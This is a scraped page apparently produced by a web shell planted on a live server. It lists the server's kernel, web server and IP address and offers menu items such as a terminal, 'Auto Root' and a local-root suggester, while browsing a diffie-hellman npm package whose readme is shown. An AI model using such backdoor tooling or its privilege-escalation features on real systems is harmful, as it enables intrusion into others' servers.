Linux unitednationsplay.com 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
nginx/1.20.1
Server IP : 188.130.139.92 & Your IP : 3.145.15.34
Domains :
Cant Read [ /etc/named.conf ]
User : web
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
www /
unp_probe /
node_modules /
diffie-hellman /
Delete
Unzip
Name
Size
Permission
Date
Action
lib
[ DIR ]
drwxr-xr-x
2021-02-04 21:24
.travis.yml
104
B
-rw-r--r--
1985-10-26 08:15
LICENSE
1.03
KB
-rw-r--r--
1985-10-26 08:15
browser.js
1.11
KB
-rw-r--r--
1985-10-26 08:15
index.js
351
B
-rw-r--r--
1985-10-26 08:15
package.json
1.56
KB
-rw-r--r--
2021-02-04 21:24
readme.md
518
B
-rw-r--r--
1985-10-26 08:15
Save
Rename
diffie hellman [](https://travis-ci.org/crypto-browserify/diffie-hellman) ==== pure js diffie-hellman, same api as node, most hard parts thanks to [bn.js](https://www.npmjs.org/package/bn.js) by [@indutny](https://github.com/indutny). In node just returns an object with `crypto.createDiffieHellman` and `crypto.getDiffieHellman` in the browser returns a shim. To require the pure JavaScript one in node `require('diffie-hellman/browser');`;